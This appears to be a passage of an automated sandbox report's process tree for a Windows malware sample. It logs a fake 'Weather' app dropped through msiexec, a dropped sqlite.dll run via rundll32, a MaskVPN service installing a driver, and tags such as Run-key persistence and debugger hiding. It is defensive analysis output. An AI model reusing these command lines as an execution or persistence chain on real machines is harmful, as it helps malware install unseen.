                                                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                PID:4240
                                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                PID:7384
                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 6C297BDD28BFC6B636E09F0AD4C13332 C
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:6228
                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding A1BA675EF065EDE2AFA705502049B60E C
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:8704
                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding B875978A1C942AF7C601C2DAFC5E3012 C
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:8040
                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding E3FA0EBDAC56AB0F7F6731118819AB7B
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:6356
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                  PID:2292
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2016
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                        PID:5960
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffba2829ec0,0x7ffba2829ed0,0x7ffba2829ee0
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:5920
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff7915a4e60,0x7ff7915a4e70,0x7ff7915a4e80
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:4116
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --mojo-platform-channel-handle=1716 /prefetch:8
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:1052
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:2
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:3240
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --mojo-platform-channel-handle=2056 /prefetch:8
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:3508
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2596 /prefetch:1
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                  PID:3860
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2036 /prefetch:2
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:5392
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --mojo-platform-channel-handle=2664 /prefetch:8
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:9196
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --mojo-platform-channel-handle=2168 /prefetch:8
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:6336
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --mojo-platform-channel-handle=2676 /prefetch:8
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:7504
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --mojo-platform-channel-handle=884 /prefetch:8
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:7456
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --mojo-platform-channel-handle=3236 /prefetch:8
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:7176
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,5453067069672448080,10954333266202563383,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5960_1679213819" --mojo-platform-channel-handle=476 /prefetch:8
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:4828
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_DBE1.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:6304
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                          PID:7928
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                            PID:7980
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                          PID:9120
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:8296
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:7792
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:9164
                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                              PID:8956
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4d565318-51bd-494d-90b9-7a637f71af17}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                PID:6200
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                PID:6396
                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:3024
                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                PID:5660
                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:5644
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                  PID:9056
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5256
                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                    PID:2320
                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                    PID:8492
                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                      MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                      PID:8484
                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                    PID:4116
                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:5568
                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                      PID:912
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                      PID:8160
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                      PID:4972
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                      PID:8288
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                      PID:7792
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                      PID:5356
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                      PID:4172
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:7192
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                        PID:7680
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:3828
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                          PID:6408
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:7712
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:7620
